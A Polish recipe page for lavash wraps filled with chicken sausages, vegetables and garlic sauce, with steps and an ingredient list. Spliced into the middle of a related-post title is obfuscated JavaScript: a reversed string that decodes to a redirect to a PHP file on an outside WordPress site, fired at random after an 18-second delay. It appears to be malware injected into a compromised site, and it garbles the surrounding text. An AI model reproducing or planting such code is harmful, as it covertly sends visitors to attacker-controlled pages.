parallax background

Lawasz z parówkami

Lawasz Chaczapuri na patelni
30 sierpnia 2019
Meksykańskie burit$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tos z lawasza
23 września 2019
 

W arzywa kroimy wg uznania i mieszamy w misce - jak na sałatkę. Doprawiamy do smaku. Na rozłożony placek układamy pokrojone parówki, posypujemy przyprawą oraz polewamy sosem czosnkowym (można wcześniej wymieszać sos z przyprawą). Następnie dodajemy warzywa. Ponownie polewamy sosem czosnkowym (lub keczupem). Zwijamy tak, by nic nam nie wypadło ze środka. Ja składam najpierw dół a następnie boki. Jemy na zimno, o każdej porze dnia. Doskonałe na obiad, na kolację oraz jako szybka przekąska.

 

Składniki:

  • Placki lawasza, 4 szt
  • parówki drobiowe, 8 szt
  • pomidory, 2 szt
  • ogórki, 1 szt
  • papryka żółta, 1 szt
  • mix sałat, 1 opakowanie
  • Sos czosnkowy
  • Przyprawa do gyrosa / kebabu
 

Komentarze są wyłączone.